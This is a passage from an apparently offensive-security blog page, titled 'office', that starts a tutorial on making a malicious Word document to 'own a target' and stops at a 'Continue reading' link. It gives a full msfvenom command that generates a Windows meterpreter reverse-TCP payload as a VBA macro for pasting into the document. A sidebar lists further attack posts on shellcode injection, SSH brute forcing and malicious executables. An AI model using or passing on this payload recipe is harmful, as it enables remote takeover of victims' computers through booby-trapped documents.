office
So you want/need a malicious word document in order to own a target, step in metasploit.
The first thing you’ll need to do is create the code that you’ll copy&paste into your word document.
1./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f vba > vbcode.txtThe output will contain 2 blocks of code; the macro and the data.
Open a new word document and Press Alt+F11 in order to open “Microsoft Visual… Continue reading →
Posted in Linux, metasploit, Uncategorized | Tagged metasploit, meterpreter, msfvenom, office, vba, visualbasic, word | Leave a comment
Recent Posts
- Blinking Hell – Export Data Using A Keyboard
- Recreating pattern_create.rb in python!
- Injecting shell code into memory using python
- Raspberry Pi as a joke Hotspot
- Timelapse with the RaspberryPi
- Use .NET csc.exe to create a malicious EXE on locked down systems
- Simple python SSH brute forcer
- python tab completion
- GPU cracking reminder for hashcat on NVidia
- RaspberryPi + Webcam = mjpg stream / CCTV?